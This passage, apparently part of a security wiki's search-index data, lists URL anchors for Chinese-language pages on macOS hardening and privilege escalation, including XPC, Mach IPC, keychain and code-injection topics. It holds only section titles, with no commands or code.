escalation/macos-protocols.html#在网络上枚举-bonjour","macos-hardening/macos-security-and-privilege-escalation/macos-protocols.html#安全考虑与近期漏洞-2024-2025","macos-hardening/macos-security-and-privilege-escalation/macos-protocols.html#禁用-bonjour","macos-hardening/macos-security-and-privilege-escalation/macos-protocols.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.html#macos-文件扩展名和-url-方案应用程序处理程序","macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.html#launchservices-数据库","macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.html#文件扩展名和-url-方案应用程序处理程序","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#macos-文件文件夹二进制文件和内存","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#文件层次结构","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#应用程序文件夹","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#包含敏感信息的文件","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#易受攻击的-pkg-安装程序","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#os-x-特定扩展","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#macos-包","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#dyld-共享库缓存-slc","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#映射-slc","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#覆盖-slcs","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#特殊文件权限","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#文件夹权限
","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#标志修饰符","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#文件-acls","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#扩展属性","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#资源分叉--macos-ads","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#decmpfs","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#universal-binaries---mach-o-format","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#macos-process-memory","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#macos-memory-dumping","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#risk-category-files-mac-os","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/index.html#log-files","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.html#macos-bundles","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.html#bundle-的基本组成部分","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.html#探索-bundles","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#macos-安装程序滥用","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#pkg-基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders
-and-binaries/macos-installers-abuse.html#层次结构","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#解压缩","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#dmg-基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#层级结构","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#通过-pkg-滥用进行特权提升","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#从公共目录执行","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#authorizationexecutewithprivileges","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#执行通过挂载","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#pkg-作为恶意软件","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#空载荷","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#分发-xml-中的-js","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#后门安装程序","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#macos-内存转储","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#内存伪影","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#交换文件","macos-hardening/macos-secur
ity-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#休眠映像","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#内存压力日志","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.html#使用-osxpmem-转储内存","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#macos-敏感位置与有趣的守护进程","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#密码","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#隐藏密码","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#etcmasterpasswd","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#keychain-dump","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#keychaindump","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#keychaindump-概述","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#kcpassword","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#interesting-information-in-databases","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#messages","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#通知","macos-hardening/macos-sec
urity-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#notes","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#preferences","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#opendirectory-permissionsplist","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#系统通知","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#darwin-通知","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#分布式通知中心","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#苹果推送通知-apn","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#用户通知","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#macos-universal-binaries--mach-o-format","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#fat-header","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-header","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-文件类型","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-标志","macos-hardening/macos-security-and-privilege-escalation/macos-files-fol
ders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-加载命令","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_segmentlc_segment_64","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_unixthreadlc_main","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_code_signature","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_encryption_info_64","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_load_dylinker","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_ident","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_uuid","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_dyld_environment","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#lc_load_dylib","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#mach-o-数据","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#objetive-c-常见部分","macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.html#swift","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#macos-objective-c","macos-hardening/macos-security-and-privi
lege-escalation/macos-basic-objective-c.html#objective-c","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#类方法和对象","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#接口属性和方法","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#类","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#对象与调用方法","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#类方法","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#setter--getter","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#实例变量","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#协议","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#一起","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#基本类","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#blocks","macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.html#文件","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#macos-提权","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#tcc-提权","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#linux-提权","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#用户交互","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#sudo-劫持","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#dock-冒充","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#tcc---root-权限提升","macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#cve-2020-9771---mount_apfs-tcc-绕过和权限提升","macos-h
ardening/macos-security-and-privilege-escalation/macos-privilege-escalation.html#敏感信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#macos-进程滥用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#进程基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#pids","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#进程组会话与联盟","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#凭证与角色","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#线程基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#线程局部变量-tlv","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#线程优先级","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#macos-进程滥用-1","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#库注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#函数钩子","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#进程间通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#electron-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#chromium-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#脏-nib","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#java-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#net-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#perl-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#ruby-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/in
dex.html#python-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#检测","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#shield","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#其他进程发出的调用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/index.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#macos-dirty-nib","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#what-are-nibxib-files","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#dirty-nib-injection-process-attacker-view","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#modern-macos-protections-venturamontereysonomasequoia","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#addressing-launch-constraints","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#enumerating-targets-and-nibs-useful-for-research--legacy-systems","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#检测与-dfir-建议","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#防御加固开发者和防御者","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#hacktricks-相关阅读","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.html#参考资料","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#macos-chromium-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html
#工具","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.html#参考","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#macos-electron-applications-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#electron-fuses","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#检查-electron-fuses","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#修改-electron-fuses","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#向-electron-应用程序添加-rce-代码","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#rce-with-electron_run_as_node","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#从应用程序-plist-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#rce-with-node_options","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#从-app-plist-注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#rce-with-inspecting","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#从应用程序-plist-注入-1","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applic
ations-injection.html#tcc-bypass-abusing-older-versions","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#run-non-js-code","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#notable-electron-macos-vulnerabilities-2023-2024","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#cve-2023-44402--asar-integrity-bypass","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#2024-runasnode--enablenodecliinspectarguments-cve-cluster","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#automatic-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#macos-函数钩子","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#函数插入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#插入-printf","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#动态插入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#方法交换","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#访问原始方法","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#method-swizzling-with-method_exchangeimplementations","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#使用-method_setimplementation-进行方法交换","macos-hardening/macos-security-and-privilege-escalation/mac
os-proces-abuse/macos-function-hooking.html#hooking-attack-methodology","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.html#参考","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#macos-ipc---进程间通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#mach-通过端口进行消息传递","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#端口权限","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#文件端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#建立通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#一个-mach-消息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#mac-ports-apis","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#调试-mach_msg","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#枚举端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#特权端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#主机特殊端口","macos-hardening/macos-security-and-privilege-escalation/macos-proce
s-abuse/macos-ipc-inter-process-communication/index.html#任务特殊端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#任务端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#线程端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#通过任务端口在线程中注入shellcode","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#通过任务端口在线程中注入-dylib","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#线程劫持通过任务端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#任务端口注入检测","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#异常端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#其他对象","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#时钟","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/index.html#处理器和处理器集","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#macos-mig---mach-interface-generator","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-ab
use/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#ndr_record","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#二进制分析","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#jtool","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#assembly","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#debug","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#macos-xpc","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#应用特定的-xpc-服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#系统范围的-xpc-服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-对象","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#启动服务","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos
-ipc-inter-process-communication/macos-xpc/index.html#xpc事件消息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc连接进程检查","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc嗅探器","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-通信-c-代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#xpc-通信-objective-c-代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#客户端在-dylb-代码中","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/index.html#remote-xpc","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#macos-xpc-授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#xpc-授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#shouldacceptnewconnection-始终为-yes","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#应用程序权限","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#权限验证","macos-hardening/macos-security-and-privilege-escalation/macos-
proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#db-信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#宽松权限","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#反向授权","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#检查是否使用了-evenbetterauthorization","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#协议通信","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#利用示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#其他被滥用的-xpc-权限助手","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#macos-xpc-连接进程检查","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#xpc-连接进程检查","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#通信攻击","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#trustcache---降级攻击防范","macos-hardenin
g/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/index.html#代码示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#macos-pid-重用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#pid-重用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#利用示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#其他示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#macos-xpc_connection_get_audit_token-攻击","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#mach-消息基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#xpc-连接","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#漏洞总结"
